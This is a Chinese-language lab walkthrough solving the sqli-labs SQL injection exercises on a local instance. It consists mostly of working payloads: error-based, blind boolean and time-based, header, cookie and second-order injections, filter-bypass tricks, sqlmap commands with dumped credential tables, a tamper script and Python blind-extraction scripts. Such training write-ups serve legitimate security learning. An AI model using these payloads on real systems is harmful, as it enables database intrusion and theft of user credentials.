sqli-labs
[TOC]
Less-1: error based string
-
判断参数ID类型
?id=1 成功 ?id=1-1 成功,且与id=1结果相同 -
判断字符串引号闭合
?id=' 报错 ?id=" 成功,且未发生变化 -
updatexml爆库、表、列名
?id=' and updatexml(0x01,concat(0x7e,database(),0x7e),0x01)%23 ?id=%27%20and%20updatexml(0x01,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%20=%20%27security%27),0x7e),0x01)%23 ?id=%27%20and%20updatexml(0x01,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name%20=%20%27users%27),0x7e),0x01)%23 -
查询user密码
?id=%27%20and%20updatexml(0x01,concat(0x7e,(select%20concat(id,%27:%27,username,%27:%27,password)%20from%20users%20limit%200,1),0x7e),0x01)%23 -
SQLmap方案
sqlmap -u 'http://localhost:9090/Less-1/?id=1' --batch --dbs -p id sqlmap -u 'http://localhost:9090/Less-1/?id=1' --batch --current-db -p id sqlmap -u 'http://localhost:9090/Less-1/?id=1' --batch -D security --tables -p id sqlmap -u 'http://localhost:9090/Less-1/?id=1' --batch -D security -T users --dump -p id Table: users [13 entries] +----+------------+----------+ | id | password | username | +----+------------+----------+ | 1 | Dumb | Dumb | | 2 | I-kill-you | Angelina | | 3 | p@ssword | Dummy | | 4 | crappy | secure | | 5 | stupidity | stupid | | 6 | genious | superman | | 7 | mob!le | batman | | 8 | admin | admin | | 9 | admin1 | admin1 | | 10 | admin2 | admin2 | | 11 | admin3 | admin3 | | 12 | dumbo | dhakkan | | 14 | admin4 | admin4 | +----+------------+----------+Less-2: error based intiger
-
判断参数ID类型
?id=1 成功 ?id=1-1 成功,无结果 ?id=2-1 成功,且与id=1结果相同 -
输入未闭合引号
?id=1' 报错 -
爆库同上Less-1
?id=1 and updatexml(0x01,concat(0x01,database(),0x01),0x01)
Less-3: error based string
-
判断参数ID类型
?id=1 成功 ?id=1-1 成功,且与id=1结果相同 -
输入未闭合引号
?id=1' 报错,报错信息中发现) -
注入语句需注意闭合),爆库同上Less-1
?id=1') and updatexml(0x01,concat(0x01,database(),0x01),0x01)%23
Less-4: error based string
-
判断参数ID类型
?id=1 成功 ?id=1-1 成功,且与id=1结果相同 -
输入未闭合引号
?id=1" 报错,报错信息中发现) -
注入语句需注意闭合),爆库同上Less-1
?id=1") and updatexml(0x01,concat(0x01,database(),0x01),0x01)%23
Less-5: double query
-
判断参数ID类型
?id=1 成功 ?id=1-1 成功,且与id=1结果相同 -
输入未闭合引号
?id=1' 报错 -
爆库同上Less-1
?id=1%27%20and%20updatexml(0x01,concat(0x01,database(),0x01),0x01)%23
Less-6: double query
-
判断参数ID类型
?id=1 成功 ?id=1-1 成功,且与id=1结果相同 -
输入未闭合引号
?id=1" 报错 -
爆库同上Less-1
?id=1%22%20and%20updatexml(0x01,concat(0x01,database(),0x01),0x01)%23
Less-7: Dump into outfile
为什么要dump into outfile,数据库是mysql运行的,php是www-data运行的,dump出来也访问不到
-
判断参数ID类型
?id=1 成功 ?id=1-1 成功,且与id=1结果相同 -
输入未闭合引号
?id=1' 报错 ...... ?id=1')) and 1=1 %23, 发现'))的闭合 -
采用bool方式注入
?id=1%27))%20and%20(select%20length(database()))%20=8%20%23 ?id=1%27))%20and%20(select%20substr(database(),1,1))%20=%27s%27%20%23 ?id=1%27))%20and%20(select%20length((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%20=%20%27security%27)))%20=29%20%23 ?id=1%27))%20and%20(select%20length((select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%20%27users%27)))%20=20%20%23 ?id=1%27))%20and%20(select%20length((select%20concat(id,%27:%27,username,%27:%27,password)%20from%20users%20limit%201)))%20=%2011%20%23 -
以上内容仅供参考,请使用sqlmap的方式
sqlmap -u 'http://localhost:9090/Less-7/?id=1' --batch --dbs -p id --technique B sqlmap -u 'http://localhost:9090/Less-7/?id=1' --batch --current-db -p id --technique B sqlmap -u 'http://localhost:9090/Less-7/?id=1' --batch -D security --tables -p id --technique B sqlmap -u 'http://localhost:9090/Less-7/?id=1' --batch -D security -T users --dump -p id --technique B Table: users [13 entries] +----+------------+----------+ | id | password | username | +----+------------+----------+ | 1 | Dumb | Dumb | | 2 | I-kill-you | Angelina | | 3 | p@ssword | Dummy | | 4 | crappy | secure | | 5 | stupidity | stupid | | 6 | genious | superman | | 7 | mob!le | batman | | 8 | admin | admin | | 9 | admin1 | admin1 | | 10 | admin2 | admin2 | | 11 | admin3 | admin3 | | 12 | dumbo | dhakkan | | 14 | admin4 | admin4 | +----+------------+----------+
Less-8: Blind bool
-
判断参数ID类型
?id=1 成功 ?id=1-1 成功,且与id=1结果相同 -
输入未闭合引号
?id=1" 回显正常 ?id=1' 无回显 ?id=1' and 1=1 %23 回显正常 ?id=1' and 1=2 %23 无回显 bool形注入同上Less-7
Less-9: Blind Time based
-
输入各种乱七八糟的东西回显均未改变,经过各种尝试发现时间注入及单引号闭合
?id=1' and (select sleep(10)) %23 -
直接上sqlmap,
sqlmap -u 'http://localhost:9090/Less-9/?id=1' --batch -D security -T users --dump -p id --technique B 实际上,有记录和无记录返回的html长度是不同的,可以据此进行bool注入
Less-10: Blind Time based
- 此题与Less-9同,闭合引号为",使用sqlmap时需要--level 2
Less-11: Error based String
使用用户名
'报错使用用户名
' or 1=1 #直接登录成功-
进行error注入爆库
uname=' and updatexml(1,concat(0x01,database(),0x01),1)#&passwd=&submit=Submit -
使用sqlmap进行进一步注入
4.1 创建请求文件11.post
POST /Less-11/ HTTP/1.1 Host: localhost:9090 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 78 Origin: http://localhost:9090 DNT: 1 Connection: keep-alive Referer: http://localhost:9090/Less-11/ Upgrade-Insecure-Requests: 1 Pragma: no-cache Cache-Control: no-cache uname=&passwd=&submit=Submit4.2 sqlmap注入
sqlmap -r 11.post --batch -D security -T users --dump -p uname --technique E
Less-12 Error based string
与上题同,闭合为")
Less-13 Error based string
与上题同,闭合为')
Less-14 Error based string
与上题同,闭合为"
Less-15 Blind Bool
使用用户名
' or 1=1 #直接登录成功使用sqlmap扫描不能利用bool可以利用sleep
-
手动注入
import string import requests def req(sql): data = { "uname": "' or {}#".format(sql), "passwd": "", "submit": "Submit" } res = requests.post("http://localhost:9090/Less-15/", data=data) return "flag.jpg" in res.text def database(): sql = "(length(database()) = {})" length = 0 for i in range(100): if req(sql.format(i)): length = i break sql = "(substr(database(),{},1) = '{}')" print(length) database_name = "" for i in range(length): for j in range(len(string.printable)): if req(sql.format(i + 1, string.printable[j])): database_name += string.printable[j] break print(database_name) def tables(): sql = "(length((select group_concat(table_name) from information_schema.tables where table_schema = 'security')) = {})" length = 0 for i in range(100): if req(sql.format(i)): length = i break sql = "(substr((select group_concat(table_name) from information_schema.tables where table_schema = 'security'),{},1) = '{}')" print(length) table_names = "" for i in range(length): for j in range(len(string.printable)): if req(sql.format(i + 1, string.printable[j])): table_names += string.printable[j] break print(table_names) def columns(): sql = "(length((select group_concat(column_name) from information_schema.columns where table_name = 'users')) = {})" length = 0 for i in range(100): if req(sql.format(i)): length = i break sql = "(substr((select group_concat(column_name) from information_schema.columns where table_name = 'users'),{},1) = '{}')" print(length) table_names = "" for i in range(length): for j in range(len(string.printable)): if req(sql.format(i + 1, string.printable[j])): table_names += string.printable[j] break print(table_names) def dump(): sql = "((select count(*) from users) = {})" count = 0 for i in range(100): if req(sql.format(i)): count = i break print(count) for c in range(count): length = 0 sql = "(length((select concat(id,':',username,':',password) from users limit {},1)) = {})" for i in range(100): if req(sql.format(c, i)): length = i break sql = "(substr((select concat(id,':',username,':',password) from users limit {},1),{},1) = '{}')" line = "" for i in range(length): for j in range(len(string.printable)): if req(sql.format(c, i + 1, string.printable[j])): line += string.printable[j] break print(line) def main(): # database() # tables() # columns() dump() if __name__ == '__main__': main()结果不区分大小写
Less-16 Blind Time based
使用用户名
") or 1=1 #直接登录成功-
sqlmap注入
sqlmap -r 16.post --batch -D security -T users --dump --dbms mysql -p uname
Less-17: Update Query Error based
- 坑:需要先知道一个有效的用户名;SQL一定要报错,不然容易把整个库的密码都更新掉;
尝试注入uname参数,passwd留空,uname写入各种奇怪SQL后均没反应;
尝试注入passwd参数,uname留空,passwd写入各种奇怪SQL后均没反应;
passwd保持
'",尝试爆破uname,使用Dhakkan即可看到报错回显;uname保持
Dhakkan,对passwd进行手工注入,这里如果使用sqlmap会把数据库扫坏;-
爆库
uname=Dhakkan&passwd=' where 1 = updatexml(1,concat(0x7e,database(),0x7e),1)#&submit=Submit uname=Dhakkan&passwd=' where 1 = updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = 'security'),0x7e),1)#&submit=Submit uname=Dhakkan&passwd=' where 1 = updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name= 'users'),0x7e),1)#&submit=Submit uname=Dhakkan&passwd=' where 1 = updatexml(1,concat(0x7e,(select concat(id,':',username,':',password) from users limit 1),0x7e),1)#&submit=Submit
Less-18: Header injection Error based
- 坑:一定得知道一个能正确登录的用户
尝试注入uname,passwd均无效;
尝试写入X-Forwarded-For,X-Reql-IP头进行注入均无效;
尝试弱口令爆破用户,发现admin:admin登录成功,并且有UA回显;
尝试使用
'"注入UA,发现单引号闭合,并且后边有两个列;-
爆库
User-Agent: ',1,updatexml(1,concat(0x7e,database(),0x7e),1))# -
sqlmap注入
sqlmap -r 18.post --batch -D security -T users --dump --technique E -p User-Agent
Less-19: Header injection Error based
与上题Less-17同,注入点在Referer
Less-20: Cookie injection Error based
与上题Less-17同,注入点在Cookie
Less-21: Cookie injection base64
与上题Less-20同,注入点Cookie的值为Base64编码
sqlmap需要使用tamper base64encode.py
sqlmap -r 21.get --batch -D security -T users --dump --technique E -p Cookie --tamper base64encode.py
Less-22: Cookie injection base64
与上题Less-21同,注入点在Cookie,闭合为双引号
sqlmap需要使用tamper base64encode.py
sqlmap -r 21.get --batch -D security -T users --dump --technique E -p Cookie --tamper base64encode.py
Less-23: Error Based
- 尝试输入id
?id=1 正常
?id=1-1 正常
?id=1' 报错
?id=1' %23 报错
?id=1' --+ 报错
?id=1' and 1=1 and ''=' 正常
?id=1' and 1=2 and ''=' 无回显
- 在中间条件的位置进行报错注入,略
Less-24: Secound Degree Injection
- 注册正常用户
abc:abc,登录修改密码,登出用户,使用新密码登录; - 整个流程一共3个接口:注册、登录、修改密码,逐个验证;
- 注册用户
'":'"(用户名密码都是单引号双引号),注册成功; - 登录用户
'":'",登录成功; - 修改密码未弹出成功页面,猜测失败,使用新密码登录失败,使用原密码登录成功;
- 说明修改密码是存在注入点的;
- 修改用户
abc的密码为'"并重新登录,发现登录成功,证明注入点存在于用户名中; - 注册用户
admin'#:123"并修改密码为123456; - 登录
admin用户密码为123456;
Less-25 Trick with OR & AND
-
判断参数id类型
?id=1 正常 ?id=1'" 报错 -
尝试报错注入
?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1)%23发现and被删掉,双写and再次尝试
?id=1' anandd updatexml(1,concat(0x7e,database(),0x7e),1)%23成功爆出库名
-
写一个简单的sqlmap tamper 处理双写过滤
#!/usr/bin/env python from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW def dependencies(): pass def tamper(payload, **kwargs): """ Replaces and to anandd , or to oorr """ payload = payload.replace("and","anandd") payload = payload.replace("AND","ANANDD") payload = payload.replace("or","oorr") payload = payload.replace("OR","OORR") return payloadsqlmap -u "http://localhost:9090/Less-25/?id=1" --batch --dbms mysql --technique E -p id --tamper doubleword.py -D security -T users --dump Table: users [13 entries] +----+------------+----------+ | id | password | username | +----+------------+----------+ | 1 | Dumb | Dumb | | 2 | I-kill-you | Angelina | | 3 | p@ssword | Dummy | | 4 | crappy | secure | | 5 | stupidity | stupid | | 6 | genious | superman | | 7 | mob!le | batman | | 8 | admin | admin | | 9 | admin1 | admin1 | | 10 | admin2 | admin2 | | 11 | admin3 | admin3 | | 12 | dumbo | dhakkan | | 14 | admin4 | admin4 | +----+------------+----------+
Less-26: Trick with comment
-
判断注入类型
?id=1'" 单引号闭合 ?id=1' or 1=1 # 空格注释均被过滤 ?id=1'||1=1||''=' 成功 -
爆库表列
http://localhost:9090/Less-26/?id=1%27||updatexml(1,concat(0x7e,database(),0x7e),1)||%27%27=%27 http://localhost:9090/Less-26/?id=1%27||updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where`table_schema`=%27security%27),0x7e),1)||%27%27=%27 http://localhost:9090/Less-26/?id=1%27||updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where`table_name`=%27users%27),0x7e),1)||%27%27=%27 http://localhost:9090/Less-26/?id=1%27||updatexml(1,concat(0x7e,(select(concat(id,':',username,':',passwoorrd))from(users)where`id`=%271%27),0x7e),1)||%27%27=%27
Less-26a: Trick with comment
-
测试注入类型
?id=1 成功 ?id='" 失败 ?id='||''=' ?id='||'1'=' 失败 ?id='||1=1||'1'=' 成功 ?id='||1=2||'1'=' 失败,blind bool -
尝试爆破
http://localhost:9090/Less-26a/?id=%27||(select(length(database())))=8||%271%27=%27 http://localhost:9090/Less-26a/?id=%27||(select(substr(database(),1,1)))='s'||%271%27=%27 略
Less-27: Trick with select & union
与Less-26同,select被过滤,用SeLect代替
Less-27a: Trick with select & union
与上两题同,双引号闭合,SeLect,blind bool
http://localhost:9090/Less-27a/?id=%22||(SeLect(length(database())))=8||%221%22=%22
Less-28: Trick with select & union
与上题同,单引号闭合
Less-28a: Trick with select & union
与上题Less-27a同
Less-29: Protection with WAF
WAF似乎并没有起到什么作用,基础的error based
Less-30: Protection with WAF
WAF似乎并没有起到什么作用,基础的blind bool
Less-31: Protection with WAF
与上题Less-29同
Less-32: Bypass addslashes
%df能吃掉反斜杠
?id=%df' or 1=1 %23 成功
?id=%df' or updatexml(1,concat(0x7e,database(),0x7e),1)%23
?id=%df' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=unhex(7365637572697479)),0x7e),1)%23
?id=%df' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=unhex(7573657273)),0x7e),1)%23
?id=%df' or updatexml(1,concat(0x7e,(select concat(id,0x3a,username,0x3a,password) from users limit 0,1),0x7e),1)%23
Less-34 Bypass ADD SLASHES
Less-32的POST版
Less-35 Bypass Add SLASHES
Less-32的简化版,不需要引号
Less-36 Bypass MySQL real escape
同Less-32
Less-37 Bypass MySQL real escape
同Less-34
Less-38 stacked Query
基础的error based
Less-39 stacked Query
基础的error based
Less-40 stacked Query
基础的blind bool
Less-41 stacked Query
基础的blind bool
Less-42 stacked Query error based
password字段存在注入,单引号闭合,error based
Less-43 stacked Query error based
password字段存在注入,单引号括号闭合,error based
Less-44 stacked Query blind
password字段存在注入,单引号括号闭合,基于response的http code是否302存在bool注入
login_user=&login_password=' or length(database()) =8#&mysubmit=Login
Less-45 stacked Query blind
与上题Less-44同,单引号括号闭合
Less-46 ORDER BY
?sort=1 || updatexml(1,concat(0x7e,database(),0x7e),1)
Less-47 ORDER BY
与上题Less-47同
Less-48 ORDRE BY Blind
?sort=if (1=1,1,(select 1 union select 2)) 有回显
?sort=if (1=2,1,(select 1 union select 2)) 无回显
blind bool
Less-49 ORDRE BY Blind
?sort=2' and if(1=1,1,(select 1 union select 2))%23 有回显
?sort=2' and if(1=2,1,(select 1 union select 2))%23 无回显
blind bool
Less-50 ORDRE BY
?sort=updatexml(1,concat(0x7e,database(),0x7e),1)
error based
Less-51 ORDER BY
?sort=' || updatexml(1,concat(0x7e,database(),0x7e),1)%23
error based
Less-52 ORDER BY
同Less-48
Less-53 ORDER BY
同Less-49
Less-54 Challenge-1
?id=1
?id=1"
?id=1' %23
?id=1' order by 3 %23
?id=1' order by 4 %23
?id=-1' union select 1,1,group_concat(schema_name) from information_schema.schemata %23
?id=-1' union select 1,1,group_concat(schema_name) from information_schema.schemata %23
?id=-1' union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23
?id=-1' union select 1,1,group_concat(column_name) from information_schema.columns where table_name='P3KMPMWT2P' %23
?id=-1' union select id,secret_7HNV,concat(sessid,':',tryy) from challenges.P3KMPMWT2P %23
Less-55 Challenge-2
?id=1
?id=1'%23
?id=1"%23
?id=2-1
?id=-1 union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23
?id=-1) union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23
?id=-1) union select 1,1,group_concat(column_name) from information_schema.columns where table_name='INEAJ9ROW1' %23
?id=-1' union select id,secret_YE4X,concat(sessid,':',tryy) from challenges.INEAJ9ROW1 %23
Less-56 Challenge-3
?id=1
?id=1'%23
?id=1"%23
?id=-1" union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23
?id=-1') union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23
?id=-1') union select 1,1,group_concat(column_name) from information_schema.columns where table_name='XB1AMCG87R' %23
?id=-1') union select id,secret_2YG9,concat(sessid,':',tryy) from challenges.XB1AMCG87R %23
Less-57 Challenge-4
?id=1
?id=1'%23
?id=-1' union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23
?id=-1" union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23
?id=-1" union select 1,1,group_concat(column_name) from information_schema.columns where table_name='ZLFUJA075M' %23
?id=-1" union select id,secret_PXK5,concat(sessid,':',tryy) from challenges.ZLFUJA075M %23
Less-58 Challenge-5
?id=-1' union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23
?id=-1" union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1) %23
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='W7PLNH9DHZ'),0x7e),1) %23
?id=-1' and updatexml(1,concat(0x7e,(select secret_O572 from challenges.W7PLNH9DHZ),0x7e),1) %23
Less-59 Challenge-6
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1) %23
?id='"
?id=-1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1) %23
?id=-1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='MJ77P2XKIV'),0x7e),1) %23
?id=-1 and updatexml(1,concat(0x7e,(select secret_C8VM from challenges.MJ77P2XKIV),0x7e),1) %23
Less-60 Challenge-7
?id='"
?id=-1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1) %23
?id=-1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='V97YZ9KR3X'),0x7e),1) %23
?id=-1") and updatexml(1,concat(0x7e,(select secret_80IV from challenges.V97YZ9KR3X),0x7e),1) %23
Less-61 Challenge-8
?id='"
?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1) %23
?id=-1')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='FJIXLCJP1F'),0x7e),1) %23
?id=-1')) and updatexml(1,concat(0x7e,(select secret_4MGK from challenges.FJIXLCJP1F),0x7e),1) %23
Less-62 Challenge-9
?id=1
?id=1 and 1=2 %23
?id=1' and 1=2 %23
?id=1') and 1=2 %23
?id=1') and 1=1 %23 确定blind bool及闭合
# 83个请求
from urllib.parse import quote
import requests
from lxml import etree
url = "http://localhost:9090/Less-62/?id={}"
headers = {
"Host": "localhost:9090",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"DNT": "1",
"Connection": "keep-alive",
"Cookie": "challenge=2b720b5359202de2d62768369718f694",
"Upgrade-Insecure-Requests": "1",
"Pragma": "no-cache",
"Cache-Control": "no-cache",
}
names = []
def req(sql):
p = quote("-1') or id = ({}) #".format(sql))
u = url.format(p)
print(u)
res = requests.post(u, headers=headers)
html = etree.HTML(res.text)
txt = html.xpath("/html/body/div[2]/font[2]/font/text()")
if len(txt) != 0:
name = str(txt[0]).replace("Your Login name :", "")
return names.index(name) + 1
return -1
def find_names():
for i in range(1, 15):
res = requests.get(url.format(i), headers=headers)
html = etree.HTML(res.text)
txt = html.xpath("/html/body/div[2]/font[2]/font/text()")
print(txt)
if len(txt) != 0:
names.append(str(txt[0]).replace("Your Login name :", ""))
else:
break
print(names)
def find_number(m1, m2):
for i in range(11):
n1 = 10 * i + m1
for j in range(10):
n2 = 11 * j + m2
if n1 == n2:
return n2
def tables():
table_name = ""
sql1 = "select mod(n,10)+1 from (select ascii(substr(group_concat(table_name),{},1))-47 as n from " \
"information_schema.tables where table_schema='challenges')t"
sql2 = "select mod(n,11)+1 from (select ascii(substr(group_concat(table_name),{},1))-47 as n from " \
"information_schema.tables where table_schema='challenges')t"
for i in range(1, 100):
m1 = req(sql1.format(i))
if m1 == -1:
break
m2 = req(sql2.format(i))
if m2 == -1:
break
asc = find_number(m1 - 1, m2 - 1) + 47
table_name += chr(asc)
return table_name
def dump(table_name):
value = ""
sql1 = "select mod(n,10)+1 from (select ascii(substr(c,{},1))-47 as n from (select 1 as a,2 as b,3 as c," \
"4 as d union select * from challenges.{} limit 1,1)t)tt"
sql2 = "select mod(n,11)+1 from (select ascii(substr(c,{},1))-47 as n from (select 1 as a,2 as b,3 as c," \
"4 as d union select * from challenges.{} limit 1,1)t)tt"
for i in range(1, 100):
m1 = req(sql1.format(i, table_name))
if m1 == -1:
break
m2 = req(sql2.format(i, table_name))
if m2 == -1:
break
asc = find_number(m1 - 1, m2 - 1) + 47
value += chr(asc)
return value
def main():
find_names()
table_name = tables()
value = dump(table_name)
print(value)
if __name__ == '__main__':
main()
Less-63 Challenge-10
与上题Less-62同,闭合为单引号'
Less-64 Challenge-11
与上题Less-62同,闭合为双括号))
Less-65 Challenge-12
与上题Less-62同,闭合为双引号括号")
